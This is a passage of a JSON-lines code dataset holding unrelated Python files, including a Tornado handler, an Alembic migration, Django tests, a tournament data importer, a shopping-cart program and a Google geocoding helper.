ax2.set_ylim(0.0,1.1)\nplt.xlim(0.2, 12.5)\nplt.legend(title='cycle')\nplt.tight_layout()\n \nplt.show()\n","sub_path":"examples/VisualizeSteadyState.py","file_name":"VisualizeSteadyState.py","file_ext":"py","file_size_in_byte":2430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"475820657","text":"#coding=utf-8\n\nimport tornado.web\nfrom bin import base\nfrom handler.basehandler import BaseHandler\n\nimport sys\nreload(sys)\nsys.setdefaultencoding(\"utf-8\")\n\ndef get_skill_info(user_id):\n \"\"\"返回该用户专业技能的相关信息\"\"\"\n from optsql.searchMySQL import search_oneuser_allinfo\n user_skill_info = search_oneuser_allinfo(table=\"skill\", user_id=user_id) #查询该用户的所有技能信息\n user_skill_info = base.delete_userid_statement(user_skill_info)\n user_skill_info = base.delete_createtime_statement(user_skill_info)\n return user_skill_info\n\n\nclass ShowSkillHandler(BaseHandler):\n @tornado.web.authenticated\n def get(self):\n user_id = base.get_id_name(self.current_user)[0]\n user_skill_info = get_skill_info(user_id=user_id) #查询该用户专业技能的所有信息\n self.write(base.get_json(user_skill_info))","sub_path":"handler/skill/showskill.py","file_name":"showskill.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"17190613","text":"\"\"\"empty message\n\nRevision ID: 0004_create_jobs\nRevises: 0003_create_tokens\nCreate Date: 2016-01-15 10:12:02.381160\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '0004_create_jobs'\ndown_revision = '0003_create_tokens'\n\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.create_table('jobs',\n sa.Column('id', postgresql.UUID(as_uuid=True), nullable=False),\n sa.Column('original_file_name', sa.String(), nullable=False),\n sa.Column('service_id', sa.BigInteger(), nullable=True),\n sa.Column('template_id', sa.BigInteger(), nullable=True),\n sa.Column('created_at', sa.DateTime(), nullable=False),\n sa.Column('updated_at', sa.DateTime(), nullable=True),\n sa.ForeignKeyConstraint(['service_id'], ['services.id'], ),\n sa.ForeignKeyConstraint(['template_id'], ['templates.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_jobs_service_id'), 'jobs', ['service_id'], unique=False)\n op.create_index(op.f('ix_jobs_template_id'), 'jobs', ['template_id'], unique=False)\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_index(op.f('ix_jobs_template_id'), table_name='jobs')\n op.drop_index(op.f('ix_jobs_service_id'), table_name='jobs')\n op.drop_table('jobs')\n ### end Alembic commands ###\n","sub_path":"migrations/versions/0004_create_jobs.py","file_name":"0004_create_jobs.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"638937938","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nimport pdb\n\nfrom django.test import TestCase\nfrom forum.models import SubCategory, Thread, Post\nfrom django.contrib.auth.models import User\nfrom django.db import transaction\nfrom random import randint\n\n# Create your tests here.\n\n\nclass ViewTests(TestCase):\n \"\"\"\n Test that all the views return 200 code.\n \"\"\"\n\n fixtures = [\"forum_testdata.json\", \"forum_users.json\"]\n\n def test_simple_urls(self):\n \"Test urls that simply need to render a successful response.\"\n\n urls = [\n \"/forum/\",\n \"/forum/login/\",\n \"/forum/register/\",\n \"/forum/rules/\",\n ]\n\n for url in urls:\n r = self.client.get(url)\n self.assertEqual(r.status_code, 200)\n\n def test_subcat(self):\n \"Test that a random subcategory returns a response.\"\n\n subcats = [s for s in SubCategory.objects.all()]\n i = randint(0, len(subcats) - 1)\n subcat = subcats[i]\n r = self.client.get(\"/forum/{}/\".format(str(subcat.id)))\n self.assertEqual(r.status_code, 200)\n\n def test_thread(self):\n \"Test that a random thread returns a response.\"\n\n threads = Thread.objects.all()\n i = randint(0, len(threads) - 1)\n thread = threads[i]\n r = self.client.get(\"/forum/{}/{}/\".format(str(thread.subcat.id), str(thread.id)))\n self.assertEqual(r.status_code, 200)\n\n def test_search(self):\n \"Test that the search form and a search query returns a response.\"\n\n r = self.client.get(\"/forum/search/\")\n self.assertEqual(r.status_code, 200)\n self.assertTrue(\"query\" not in r.context)\n query = \"Lorem+Ipsum\"\n r = self.client.get(\"/forum/search/?q={}\".format(query))\n self.assertEqual(r.status_code, 200)\n self.assertTrue(\"object_list\" in r.context)\n self.assertTrue(\"query\" in r.context)\n\nclass TestAuthenitcation(TestCase):\n \"\"\"\n Test all functionality related to users and authentication.\n\n Tests user creation, user login, user profile, creation of threads, \n creation of posts, editing of posts, and deletes the user afterword.\n \"\"\"\n\n fixtures = [\"forum_testdata.json\", \"forum_users.json\"]\n\n def setUp(self):\n \"Log in user and set fields for accessing thread and post.\"\n\n self.username = \"tempusername\"\n self.password = \"tempassword\"\n self.thread_name = \"tempthread\"\n self.post_content = \"temppost\"\n User.objects.create_user(username=self.username, password=self.password)\n u = User.objects.get(username=self.username)\n login = self.client.login(username=self.username, password=self.password)\n\n def test_thread_and_post(self):\n \"Test creation of thread and post.\"\n\n s = SubCategory.objects.first()\n with transaction.atomic():\n Thread.objects.create(name=self.thread_name, subcat=s)\n t = Thread.objects.get(name=self.thread_name)\n self.assertEqual(t.name, self.thread_name)\n\n with transaction.atomic():\n a = User.objects.get(username=self.username)\n Post.objects.create(content=self.post_content, thread=t, author=a)\n p = Post.objects.get(content=self.post_content)\n self.assertEqual(p.content, self.post_content)\n p.content = \"New Content\"\n self.assertEqual(p.content, \"New Content\")\n\n def test_profile(self):\n \"Test that profile renders a successful response.\"\n\n profile_r = self.client.get(\"/forum/profile/\")\n self.assertEqual(profile_r.status_code, 200)\n","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"184230163","text":"def copyRandomList(self, head):\n \"\"\"\n :type head: RandomListNode\n :rtype: RandomListNode\n \"\"\"\n node_map = {}\n if head is None: return None\n new_head = RandomListNode(head.label)\n ptr = head.next\n new_ptr = new_head\n node_map.update({head: new_head})\n # Set only next nodes\n while ptr is not None:\n new_node = RandomListNode(ptr.label)\n new_ptr.next = new_node\n new_ptr = new_node\n node_map.update({ptr: new_ptr})\n ptr = ptr.next\n # Set random pointers\n ptr = head\n new_ptr = new_head\n while ptr is not None:\n if ptr.random is not None:\n new_ptr.random = node_map[ptr.random]\n ptr = ptr.next\n new_ptr = new_ptr.next\n return new_head\n","sub_path":"Linked_Lists/Deep copy.py","file_name":"Deep copy.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"299716671","text":"#!/usr/bin/python3m\r\nimport logging\r\nimport sys\r\n\r\ndef create_logger():\r\n logger = logging.getLogger('bbqpi_logger')\r\n logger.setLevel(logging.DEBUG)\r\n\r\n fh = logging.FileHandler('bbqpi.log', mode='w')\r\n fh.setLevel(logging.DEBUG)\r\n\r\n ch = logging.StreamHandler(stream=sys.stdout)\r\n ch.setLevel(logging.DEBUG)\r\n\r\n formatter = logging.Formatter('%(asctime)s %(levelname)s %(funcName)s %(message)s',datefmt='%Y-%m-%d %H:%M:%S')\r\n fh.setFormatter(formatter)\r\n ch.setFormatter(formatter)\r\n\r\n logger.addHandler(ch)\r\n logger.addHandler(fh)\r\n return logger\r\n","sub_path":"python/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"575048905","text":"from django.db.models import Q\n\nimport adjallocation.models as am\nimport adjfeedback.models as fm\nimport breakqual.models as bm\nimport tournaments.models as tm\nimport participants.models as pm\nimport venues.models as vm\nfrom participants.emoji import set_emoji\n\nfrom .base import BaseTournamentDataImporter, make_interpreter, make_lookup\n\n\nclass BootsTournamentDataImporter(BaseTournamentDataImporter):\n \"\"\"Boots: Added for British Parliamentary convenience.\"\"\"\n\n lookup_round_stage = make_lookup(\"round stage\", {\n (\"preliminary\", \"p\"): tm.Round.STAGE_PRELIMINARY,\n (\"elimination\", \"break\", \"e\", \"b\"): tm.Round.STAGE_ELIMINATION,\n })\n\n lookup_draw_type = make_lookup(\"draw type\", {\n (\"random\", \"r\"): tm.Round.DRAW_RANDOM,\n (\"manual\", \"m\"): tm.Round.DRAW_MANUAL,\n (\"round robin\", \"d\"): tm.Round.DRAW_ROUNDROBIN,\n (\"power paired\", \"p\"): tm.Round.DRAW_POWERPAIRED,\n (\"elimination\", \"break\", \"e\", \"b\"): tm.Round.DRAW_ELIMINATION,\n })\n\n lookup_gender = make_lookup(\"gender\", {\n (\"male\", \"m\"): pm.Person.GENDER_MALE,\n (\"female\", \"f\"): pm.Person.GENDER_FEMALE,\n (\"other\", \"o\"): pm.Person.GENDER_OTHER,\n })\n\n order = [\n 'break_categories',\n 'rounds',\n 'institutions',\n 'speaker_categories',\n 'adjudicators',\n 'scores',\n 'teams',\n 'venues',\n 'team_conflicts',\n 'institution_conflicts',\n 'team_institution_conflicts',\n ]\n\n def import_rounds(self, f):\n round_interpreter = make_interpreter(\n tournament=self.tournament,\n stage=self.lookup_round_stage,\n draw_type=self.lookup_draw_type,\n break_category=lambda x: bm.BreakCategory.objects.get(slug=x, tournament=self.tournament)\n )\n self._import(f, tm.Round, round_interpreter)\n\n # Set the round with the lowest known seqno to be the current round.\n self.tournament.current_round = self.tournament.round_set.order_by('seq').first()\n self.tournament.save()\n\n def import_institutions(self, f):\n self._import(f, pm.Institution)\n\n def import_break_categories(self, f):\n interpreter = make_interpreter(tournament=self.tournament)\n self._import(f, bm.BreakCategory, interpreter)\n\n def import_speaker_categories(self, f):\n interpreter = make_interpreter(tournament=self.tournament)\n self._import(f, pm.SpeakerCategory, interpreter)\n\n def import_adjudicators(self, f):\n interpreter = make_interpreter(\n institution=pm.Institution.objects.lookup,\n tournament=self.tournament,\n gender=self.lookup_gender,\n )\n adjudicators = self._import(f, pm.Adjudicator, interpreter)\n\n def own_institution_conflict_interpreter(lineno, line):\n adjudicator = adjudicators[lineno]\n if adjudicator.institution is not None:\n return {\n 'adjudicator': adjudicator,\n 'institution': adjudicator.institution,\n }\n self._import(f, am.AdjudicatorInstitutionConflict, own_institution_conflict_interpreter)\n\n def import_scores(self, f):\n # The base class can only create instances, it can't update existing ones.\n # To get around this, we create the histories first, and then set the scores\n # on adjudicators.\n interpreter = make_interpreter(\n round=None,\n adjudicator=lambda x: pm.Adjudicator.objects.get(\n Q(tournament=self.tournament) | Q(tournament__isnull=True), name=x),\n )\n histories = self._import(f, fm.AdjudicatorTestScoreHistory, interpreter)\n\n for history in histories.values():\n history.adjudicator.test_score = history.score\n history.adjudicator.save()\n\n def import_teams(self, f):\n speaker_fields = ['name', 'email', 'category', 'gender']\n\n team_interpreter_part = make_interpreter(\n tournament=self.tournament,\n institution=pm.Institution.objects.lookup,\n DELETE=['speaker%d_%s' % (i, field) for i in [1, 2] for field in speaker_fields] + ['break_category']\n )\n\n def team_interpreter(lineno, line):\n line = team_interpreter_part(lineno, line)\n if not line.get('short_reference'):\n line['short_reference'] = line['reference'][:34]\n return line\n teams = self._import(f, pm.Team, team_interpreter)\n set_emoji(teams.values(), self.tournament)\n\n def break_category_interpreter(lineno, line):\n if line.get('break_category'):\n for category in line['break_category'].split('/'):\n yield {\n 'team': teams[lineno],\n 'breakcategory': self.tournament.breakcategory_set.get(slug=category)\n }\n self._import(f, pm.Team.break_categories.through, break_category_interpreter)\n\n def speakers_interpreter(lineno, line):\n for i in [1, 2]:\n subline = {field: line.get('speaker%d_%s' % (i, field)) for field in ['name', 'email', 'gender']}\n subline['gender'] = self.lookup_gender(subline['gender'])\n subline['team'] = teams[lineno]\n yield subline\n speakers = self._import(f, pm.Speaker, speakers_interpreter)\n\n def speaker_category_interpreter(lineno, line):\n for i in [1, 2]:\n if line.get('speaker%d_category' % i):\n for category in line['speaker%d_category' % i].split('/'):\n yield {\n 'speakercategory': self.tournament.speakercategory_set.get(slug=category),\n 'speaker': speakers[(lineno, i)],\n }\n self._import(f, pm.Speaker.categories.through, speaker_category_interpreter)\n\n def import_venues(self, f, auto_create_categories=True):\n interpreter = make_interpreter(tournament=self.tournament, DELETE=['category'])\n self._import(f, vm.Venue, interpreter)\n\n if auto_create_categories:\n def venue_category_interpreter(lineno, line):\n if not line.get('category'):\n return None\n return {'name': line['category']}\n self._import(f, vm.VenueCategory, venue_category_interpreter, expect_unique=False)\n\n def venue_category_venue_interpreter(lineno, line):\n if line.get('category'):\n return {\n 'venuecategory': vm.VenueCategory.objects.get(name=line['category']),\n 'venue': vm.Venue.objects.get(name=line['name'])\n }\n\n self._import(f, vm.VenueCategory.venues.through, venue_category_venue_interpreter)\n\n def import_team_conflicts(self, f):\n interpreter = make_interpreter(\n team=lambda x: pm.Team.objects.lookup(name=x, tournament=self.tournament),\n adjudicator=lambda x: pm.Adjudicator.objects.get(\n Q(tournament=self.tournament) | Q(tournament__isnull=True), name=x),\n )\n self._import(f, am.AdjudicatorConflict, interpreter)\n\n def import_institution_conflicts(self, f):\n interpreter = make_interpreter(\n institution=pm.Institution.objects.lookup,\n adjudicator=lambda x: pm.Adjudicator.objects.get(\n Q(tournament=self.tournament) | Q(tournament__isnull=True), name=x),\n )\n self._import(f, am.AdjudicatorInstitutionConflict, interpreter)\n\n def import_team_institution_conflicts(self, f):\n \"\"\"Adds team conflicts for all adjudicators for the listed institution.\n For example: if \"institution\" is Hobbiton and \"team\" is Dorwinion AB,\n this adds conflicts for Dorwinion AB against all adjudicators from\n Hobbiton.\"\"\"\n\n def interpreter(lineno, line):\n institution = pm.Institution.objects.lookup(line['institution'])\n team = pm.Team.objects.lookup(line['team'])\n for adj in institution.adjudicator_set.all():\n yield {\n 'team': team,\n 'adjudicator': adj,\n }\n self._import(f, am.AdjudicatorConflict, interpreter)\n","sub_path":"tabbycat/importer/importers/boots.py","file_name":"boots.py","file_ext":"py","file_size_in_byte":8319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"243418148","text":"# %load q06_create_runs_series/build.py\n#Default Imports\nfrom greyatomlib.numpy_advanced.q01_get_total_deliveries_players.build import ipl_matches_array\nimport pandas as pd\n\nmatch = ipl_matches_array[:,[0,11,16]]\ndelivery = pd.Series(match[:,1])\ndef create_runs_series(match_code):\n df = pd.DataFrame(data = match,index = delivery)\n new_df = df[df.iloc[:,0] == match_code]\n runs = new_df.iloc[:,2]\n return runs\n#Your Solution\n","sub_path":"q06_create_runs_series/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"210133182","text":"import random\nimport numpy as np\n\n\ndef train_test_divide(data):\n ndim = data['X'].shape\n num_rain = round(0.7*ndim[1])\n num_test = ndim[1] - num_rain\n\n test = random.sample(range(0, ndim[1]), num_test)\n ttmap = np.zeros([ndim[1], 1])\n ttmap[test] = 1\n train = np.where(ttmap == 0)\n train = {'X': data['X'][:, train[0]], 'Y': data['Y'][:, train[0]]}\n test = {'X': data['X'][:, test], 'Y': data['Y'][:, test]}\n\n return {'train': train, 'test': test}\n","sub_path":"dataset/TrainTestDivide.py","file_name":"TrainTestDivide.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"175794239","text":"#Name: Nguyen Vo\r\n#PISD: 1673509\r\n\r\n\r\n#Initalize class ItemToPurchase\r\nclass ItemToPurchase:\r\n def __init__(self, name = 'none', price = 0, quantity = 0, description = 'none'):\r\n self.item_name = name\r\n self.item_price = price\r\n self.item_quantity = quantity\r\n self.item_description = description\r\n\r\n def print_item_cost(self):\r\n print(self.item_name + ' ' + str(self.item_quantity) + ' @ $' + str(int(self.item_price)) + ' = $' + str(int(self.item_price * self.item_quantity)))\r\n\r\n def print_item_description(self): #add print description method on for part 2 \r\n print(self.item_name + ': ' + self.item_description)\r\n\r\n#Initialize class ShoppingCart\r\nclass ShoppingCart:\r\n def __init__(self, customer_name = 'none', current_date = 'January 1, 2016'):\r\n self.customer_name = customer_name\r\n self.current_date = current_date\r\n self.cart_items = []\r\n\r\n def add_item(self, ItemToPurchase): #add items info into list \r\n self.cart_items.append(ItemToPurchase)\r\n\r\n def remove_item(self, itemName): #remove items from the list only if it already in the cart \r\n removeItem = False\r\n for i in self.cart_items:\r\n if i.item_name == itemName:\r\n self.cart_items.remove(i)\r\n removeItem = True\r\n break\r\n if not removeItem:\r\n print('Item not found in cart. Nothing removed.')\r\n\r\n def modify_item(self, ItemToPurchase): #retrieving info of item from ItemToPurchase class and modify item\r\n modifyItem = False\r\n for i in range(len(self.cart_items)):\r\n if self.cart_items[i].item_name == ItemToPurchase.item_name:\r\n modifyItem = True\r\n if (ItemToPurchase.item_price == 0 and ItemToPurchase.item_quantity == 0 and ItemToPurchase.item_description == 'none'): #checking default \r\n break\r\n else:\r\n if (ItemToPurchase.item_price != 0):\r\n self.cart_items[i].item_price = ItemToPurchase.item_price\r\n elif (ItemToPurchase.item_quantity != 0):\r\n self.cart_items[i].item_quantity = ItemToPurchase.item_quantity\r\n elif (ItemToPurchase.item_description != 'none'):\r\n self.cart_items[i].item_description = ItemToPurchase.item_description\r\n break\r\n if not modifyItem:\r\n print('Item not found in cart. Nothing modified.')\r\n\r\n def get_num_items_in_cart(self):\r\n numItems = 0 #quantity initilized as 0 (empty) and increase and item added \r\n for i in self.cart_items:\r\n numItems += i.item_quantity\r\n return numItems\r\n\r\n def get_cost_of_cart(self):\r\n totalCost = 0 #calculate cost by item quantity multiply to cost of that item\r\n Cost = 0\r\n for i in self.cart_items:\r\n Cost = i.item_quantity * i.item_price\r\n totalCost += Cost\r\n return totalCost\r\n\r\n def print_total(self):\r\n totalCost = self.get_cost_of_cart() #print total cost if only cart is not empty\r\n if totalCost == 0:\r\n print('SHOPPING CART IS EMPTY')\r\n else:\r\n print(self.customer_name + \"'s Shopping Cart - \" + self.current_date)\r\n print('Number of Items: ' + str(self.get_num_items_in_cart()) + '\\n')\r\n for i in self.cart_items:\r\n i.print_item_cost()\r\n\r\n print('\\nTotal: $' + str(totalCost))\r\n\r\n def print_description(self):\r\n if len(self.cart_items) == 0: #print description if only item already define in cart\r\n print('SHOPPING CART IS EMPTY')\r\n else:\r\n print(self.customer_name + \"'s Shopping Cart - \" + self.current_date)\r\n print('\\nItem Descriptions')\r\n for item in self.cart_items:\r\n item.print_item_description()\r\n\r\n def print_menu(newCart):\r\n customerCart = newCart\r\n menu = ('\\nMENU\\n'\r\n 'a - Add item to cart\\n'\r\n 'r - Remove item from cart\\n'\r\n 'c - Change item quantity\\n' #creating menu for selection desire, each letter corresponding to methods defined above\r\n \"i - Output items' descriptions\\n\"\r\n 'o - Output shopping cart\\n'\r\n 'q - Quit\\n')\r\n cmd = ''\r\n while cmd != 'q':\r\n print(menu)\r\n cmd = input('Choose an option:\\n')\r\n while (cmd != 'a' and cmd != 'o' and cmd != 'i' and cmd != 'q' and cmd != 'r' and cmd != 'c'):\r\n cmd = input('Choose an option:\\n')\r\n if cmd == 'a':\r\n print(\"ADD ITEM TO CART\")\r\n item_name = input('Enter the item name:\\n')\r\n item_description = input('Enter the item description:\\n')\r\n item_price = int(input('Enter the item price:\\n'))\r\n item_quantity = int(input('Enter the item quantity:\\n'))\r\n itemtoPurchase = ItemToPurchase(item_name, item_price, item_quantity, item_description)\r\n customerCart.add_item(itemtoPurchase)\r\n elif cmd == 'o':\r\n print('OUTPUT SHOPPING CART')\r\n customerCart.print_total()\r\n elif cmd == 'i':\r\n print(\"OUTPUT ITEMS' DESCRIPTIONS\")\r\n customerCart.print_description()\r\n\r\n elif cmd == 'r':\r\n print('REMOVE ITEM FROM CART')\r\n itemName = input('Enter name of item to remove:\\n')\r\n customerCart.remove_item(itemName)\r\n elif cmd == 'c':\r\n print('CHANGE ITEM QUANTITY')\r\n itemName = input('Enter the item name:\\n')\r\n Qty = int(input('Enter the new quantity:\\n'))\r\n itemToPurchase = ItemToPurchase(itemName,0,Qty)\r\n customerCart.modify_item(itemToPurchase)\r\n\r\n \r\n#main body part \r\nif __name__ == '__main__':\r\n customerName = input(\"Enter customer's name:\\n\")\r\n Date = input(\"Enter today's date:\\n\")\r\n\r\n print('\\nCustomer name:', customerName)\r\n print(\"Today's date:\", Date)\r\n\r\n newCart = ShoppingCart(customerName, Date) \r\n newCart.print_menu()\r\n","sub_path":"Lab10.19.py","file_name":"Lab10.19.py","file_ext":"py","file_size_in_byte":6466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"75472179","text":"'''\nI could not find a \"something\" to get geographical coordinates for Python 3.3 \nso I made this for Python 3.3. It returns not only the coordinates but also a \nnice googly-formatted address, postal code, country, et cetera.\nFeel free to use it in your script but mind the daily quota and avoid parsing too many\naddresses all at once. In short, don't be a dick.\nThe function name is getCoordinates\n@author: freonius@gmail.com\n'''\nimport urllib.request\nimport urllib.parse\nimport json\n\ndef getCoordinates(address) -> dict:\n\t\"\"\"\n\tGet data for a give address.\n\tThe function returns a dictionary with keys \"long\" (for the longitude), \"lat\" for\n\tthe latitude; if the address is not found the values for both will be 0; \"address\" (for \n\tthe\tfully formatted address), \"street\" (for the street name), \"city\", \"province\", \n\t\"region\", \"country\" and \"postal_code\" (they explain themselves, don't they?); if no \n\tdata for these values can be given the key will be present but its value will be an \n\tempty string. \n\tIt accepts one parameter, the address as a string. Try to be as precise as possible:\n\tso try \"Via Nuova dei Caccini Florence Italy\", and not \"Via Nuova dei Caccini Florence\"\n\t(omitting the country for exemple).\n\tI know the error reporting isn't the best (mainly because there is none) but for the\n\tway I have to use it right now I felt it was smoother this way.\n\t\"\"\"\n\t#Return values initialized to default (0s and empty strings)\n\trtnv = {\n\t\t\t\"long\" : 0,\n\t\t\t\"lat\" : 0,\n\t\t\t\"address\" : \"\",\n\t\t\t\"street\" : \"\",\n\t\t\t\"city\" : \"\",\n\t\t\t\"province\" : \"\",\n\t\t\t\"region\" : \"\",\n\t\t\t\"country\" : \"\",\n\t\t\t\"postal_code\" : \"\"\n\t\t\t}\n\tmain_url = \"http://maps.googleapis.com/maps/api/geocode/json?\"\n\tparam = {\n\t\t\"address\" : address,\n\t\t\"sensor\" : \"false\"\n\t\t}\n\turl = main_url + urllib.parse.urlencode(param)\n\ttry:\n\t\tout = json.loads(urllib.request.urlopen(url).read().decode(\"utf-8\"))\n\texcept urllib.request.URLError:\n\t\treturn rtnv\t\t#Something went wrong with the request\n\texcept ValueError:\n\t\treturn rtnv\t\t#Something went wrong with the json decode\n\t#Default values\n\tif \"Status\" in out or \"status\" in out:\n\t\tif \"Status\" in out:\n\t\t\tstat = \"Status\"\n\t\telse:\n\t\t\tstat = \"status\"\n\t\tif \"code\" in out[stat]:\n\t\t\tif out[stat][\"code\"] == 610:\n\t\t\t\t#610 is the no result code returned by Google from what I have seen while testing\n\t\t\t\treturn rtnv\n\t#Assume we make it so far, now let's fetch the data\n\tif \"results\" in out:\n\t\t#if 0 not in out[\"results\"]:\n\t\t#\treturn rtnv\n\t\tres = out[\"results\"][0]\t\t#Main resource\n\t\tif \"formatted_address\" in res:\n\t\t\trtnv[\"address\"] = res[\"formatted_address\"]\t#Full address\n\t\tif \"address_components\" in res:\n\t\t\taddress_components = res[\"address_components\"]\t#Should be a list holding all the values\n\t\t\tfor addr in address_components:\n\t\t\t\tif \"types\" in addr:\n\t\t\t\t\tif \"route\" in addr[\"types\"]:\t\t#Street\n\t\t\t\t\t\tif \"long_name\" in addr:\n\t\t\t\t\t\t\trtnv[\"street\"] = addr[\"long_name\"]\n\t\t\t\t\telif \"locality\" in addr[\"types\"]:\t#City\n\t\t\t\t\t\tif \"long_name\" in addr:\n\t\t\t\t\t\t\trtnv[\"city\"] = addr[\"long_name\"]\n\t\t\t\t\telif \"administrative_area_level_2\" in addr[\"types\"]:\t#Province\n\t\t\t\t\t\tif \"long_name\" in addr:\n\t\t\t\t\t\t\trtnv[\"province\"] = addr[\"long_name\"]\n\t\t\t\t\telif \"administrative_area_level_1\" in addr[\"types\"]:\t#Region\n\t\t\t\t\t\tif \"long_name\" in addr:\n\t\t\t\t\t\t\trtnv[\"region\"] = addr[\"long_name\"]\n\t\t\t\t\telif \"country\" in addr[\"types\"]:\t#Country\n\t\t\t\t\t\tif \"long_name\" in addr:\n\t\t\t\t\t\t\trtnv[\"country\"] = addr[\"long_name\"]\n\t\t\t\t\telif \"postal_code\" in addr[\"types\"]:\t#Postal Code\n\t\t\t\t\t\tif \"long_name\" in addr:\n\t\t\t\t\t\t\trtnv[\"postal_code\"] = addr[\"long_name\"]\n\t\tif \"geometry\" in res:\n\t\t\tif \"location\" in res[\"geometry\"]:\n\t\t\t\tif \"lng\" in res[\"geometry\"][\"location\"] and \"lat\" in res[\"geometry\"][\"location\"]:\n\t\t\t\t\trtnv[\"long\"] = res[\"geometry\"][\"location\"][\"lng\"]\n\t\t\t\t\trtnv[\"lat\"] = res[\"geometry\"][\"location\"][\"lat\"]\n\treturn rtnv\n\nif __name__ == \"__main__\":\n\twhile True:\n\t\taddr = input(\"Enter the address:\")\n\t\tif addr == \"q\" or addr == \"Q\":\n\t\t\tbreak\n\t\tstuff = getCoordinates(addr)\n\t\tif stuff[\"lat\"] == 0:\n\t\t\tprint(\"No address found!\")\n\t\t\tcontinue\n\t\tfor key in stuff.keys():\n\t\t\tprint(key,\"->\",stuff[key])","sub_path":"Nagamaki/q_connect/gglmap.py","file_name":"gglmap.py","file_ext":"py","file_size_in_byte":4052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"185668309","text":"class Solution:\n def numRescueBoats(self, people, limit):\n \"\"\"\n :type people: List[int]\n :type limit: int\n :rtype: int\n \"\"\"\n people.sort()\n i = 0\n j = len(people) - 1\n count = 0\n while i <= j:\n t = limit - people[j]\n if i < j and t >= people[i]:\n i += 1\n j -= 1\n count += 1\n return count\n","sub_path":"problems851-900/leetcode-881.py","file_name":"leetcode-881.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"236136229","text":"import os\nscript_dir = os.path.dirname(__file__) #<-- absolute dir the script is in\nrel_path = \"data.txt\"\nabs_file_path = os.path.join(script_dir, rel_path)\nwith open(abs_file_path) as f:\n lines = f.readlines()\n\nrows = [0] * len(lines)\ncolumns = [0] * len(lines)\nids = [0] * len(lines)\nlow = 0\nhigh = 127\n\nfor i in range(len(lines)):\n low = 0\n high = 127\n for j in range(7):\n diff = high - low + 1\n if lines[i][j] == 'F':\n high -= (diff / 2)\n elif lines[i][j] == 'B':\n low += (diff / 2)\n rows[i] = low\n\n low = 0\n high = 7\n for j in range(7, 10):\n diff = high - low + 1\n if lines[i][j] == 'L':\n high -= (diff / 2)\n elif lines[i][j] == 'R':\n low += (diff / 2)\n columns[i] = low\n ids[i] = (rows[i] * 8) + columns[i]\n\nid = set(sorted(ids))\nid2 = list(id)\n\nfor i in range(1, len(id2)):\n if id2[i - 1] != id2[i] - 1:\n print(id2[i] - 1)\n break","sub_path":"day5/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"607496600","text":"\"\"\"\nThis file consider config parameters for authorization to server VoiceKit\n\"\"\"\n\nMAX_LENGTH = 32 * 10**6\nCHUNK_SIZE = 8192\n\nlanguage_code = \"ru-RU\"\n\nclient_config = {\n \"host_stt\": \"stt.tinkoff.ru\",\n \"host_tts\": \"tts.tinkoff.ru\",\n \"port\": 443\n}\n","sub_path":"tinkoff_voicekit_client/speech_utils/config_data.py","file_name":"config_data.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"375101967","text":"\n# coding: utf-8\n\n# In[56]:\n\nimport time\n\n\n# In[41]:\n\ndef fib(n):\n if n == 1:\n return 1\n elif n == 2:\n return 2\n else:\n return fib(n-1) + fib(n-2)\n\n\n# In[63]:\n\nstart = time.time()\n\nresult = 0\ncurrent = 0\ni = 1\nwhile current < 4000000: \n current = fib(i)\n if current%2 == 0:\n result += current\n i += 1\n\nprint(result)\n\nend = time.time()\nelapsed = str(end - start)\nprint(\"Runtime: \"+elapsed+\" sec\")\n\n\n# In[ ]:\n\n\n\n","sub_path":"P2-EvenFibonacci.py","file_name":"P2-EvenFibonacci.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"192888001","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n# __author__ = \"Lex\"\n# Date: 2017/12/21\n\n# 示例1\n# from threading import Thread\n# import time\n#\n# def foo(name):\n# time.sleep(2)\n# print('%s say hello'% name)\n#\n# if __name__ == '__main__':\n#\n# t=Thread(target=foo,args=('name',))\n# t.setDaemon(True)\n# t.start()\n#\n# print('主线程')\n# time.sleep(1)\n# print(t.is_alive())\n\n\n#示例2\n\nfrom threading import Thread\nimport time\ndef foo():\n print(123)\n time.sleep(3)\n print(\"end123\")\n\ndef bar():\n print(456)\n time.sleep(2)\n print(\"end456\")\n\nif 